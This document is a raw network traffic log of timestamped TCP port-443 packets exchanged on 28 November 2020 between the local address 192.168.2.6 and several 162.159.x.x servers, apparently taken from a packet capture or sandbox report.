Nov 28, 2020 10:25:11.308861971 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.308908939 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.308928967 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.308954000 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.308979988 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.308996916 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.309036970 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.309050083 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.309077024 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.309115887 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.309134960 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.309155941 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.309192896 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.309240103 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.309278965 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:18.843692064 CET	49737	443	192.168.2.6	162.159.136.232
Nov 28, 2020 10:25:18.860045910 CET	443	49737	162.159.136.232	192.168.2.6
Nov 28, 2020 10:25:18.862127066 CET	49737	443	192.168.2.6	162.159.136.232
Nov 28, 2020 10:25:18.865458965 CET	49737	443	192.168.2.6	162.159.136.232
Nov 28, 2020 10:25:18.881906033 CET	443	49737	162.159.136.232	192.168.2.6
Nov 28, 2020 10:25:18.882587910 CET	49737	443	192.168.2.6	162.159.136.232
Nov 28, 2020 10:25:18.986382961 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.002896070 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.003113985 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.015038967 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.031522036 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.033555984 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.033601999 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.033627987 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.033791065 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.042996883 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.059386969 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.059515953 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.140775919 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.157092094 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172255039 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172293901 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172313929 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172329903 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172352076 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172367096 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172389030 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172405958 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172430992 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172447920 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172470093 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172489882 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172493935 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172508955 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172525883 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172529936 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172544003 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172554016 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172561884 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172579050 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172596931 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172600031 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172612906 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172627926 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172630072 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172641039 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172662973 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172667980 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172684908 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172691107 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172713995 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172741890 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172743082 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172770023 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172786951 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172812939 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172830105 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172837019 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172843933 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172858953 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172882080 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172894955 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172904015 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172924995 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172924042 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172949076 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172969103 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.172970057 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.172991037 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173005104 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.173012972 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173033953 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173044920 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.173054934 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173078060 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173091888 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.173103094 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173129082 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173134089 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.173154116 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173177004 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173198938 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173204899 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.173218012 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173239946 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173243046 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.173264027 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173278093 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.173290968 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173310995 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.173311949 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173333883 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173357010 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173360109 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.173381090 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173415899 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173439980 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173456907 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.173458099 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173476934 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173496962 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173512936 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.173576117 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.189910889 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.189939022 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.189951897 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.189970016 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.189987898 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190004110 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190023899 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190040112 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190046072 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190059900 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190069914 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190073967 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190077066 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190097094 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190105915 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190120935 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190129042 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190140009 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190155983 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190172911 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190185070 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190191031 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190208912 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190212011 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190226078 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190242052 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190253973 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190259933 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190277100 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190293074 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190299988 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190310955 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190335989 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190349102 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190351963 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190361977 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190377951 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190393925 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190407991 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190412045 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190423965 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190428972 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190447092 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190463066 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190468073 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190483093 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190486908 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190501928 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190519094 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190527916 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190535069 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190551996 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190560102 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190567970 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190584898 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190584898 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190599918 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190619946 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190630913 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190638065 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190653086 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190664053 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190695047 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190705061 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190721035 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190737963 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190753937 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190759897 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190773964 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190784931 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190792084 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190808058 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190821886 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.190830946 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.190865993 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.206969976 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207014084 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207039118 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207061052 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207087994 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207114935 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207122087 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207146883 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207163095 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207169056 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207190037 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207211018 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207216024 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207237959 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207254887 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207258940 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207283020 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207315922 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207328081 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207336903 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207359076 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207360983 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207382917 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207393885 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207402945 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207425117 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207442045 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207446098 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207467079 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207479954 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207490921 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207537889 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207541943 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207566023 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207592010 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207606077 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207618952 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207645893 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207672119 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207700968 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207705975 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207732916 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207735062 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207762957 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207789898 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207804918 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207818031 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207837105 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207844973 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207871914 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207900047 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207920074 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207932949 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207950115 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.207966089 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.207992077 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.208019972 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.208035946 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.208048105 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.208070993 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.220763922 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.229799032 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.237123013 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.237153053 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.237170935 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.237332106 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.237361908 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246192932 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246223927 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246248007 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246284008 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246309042 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246309996 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246325016 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246352911 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246356010 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246376038 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246397972 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246402979 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246418953 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246426105 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246447086 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246469975 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246490955 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246510029 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246511936 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246530056 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246542931 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246551037 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246575117 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246576071 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246597052 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246599913 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246622086 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246643066 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246665001 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246685982 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246706963 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246730089 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246728897 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246745110 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246757030 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246758938 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246782064 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246783972 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246803045 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246820927 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246828079 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246850967 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246874094 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246895075 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246895075 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246916056 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246922016 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246942997 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246967077 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.246968031 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.246988058 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247009993 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247014046 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.247030973 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247051001 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247052908 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.247071028 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247092962 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247092962 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.247117996 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247140884 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247159004 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.247162104 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247183084 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247195005 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.247204065 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247224092 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247241974 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.247243881 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.247281075 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.253698111 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.253726006 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.253750086 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.253871918 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.263480902 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263524055 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263562918 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263601065 CET	443	49738	162.159.130.233	192.168.2.6
Nov 28, 2020 10:25:19.263633013 CET	49738	443	192.168.2.6	162.159.130.233
Nov 28, 2020 10:25:19.263643026 CET	443	49738	162.159.130.233	192.168.2.6
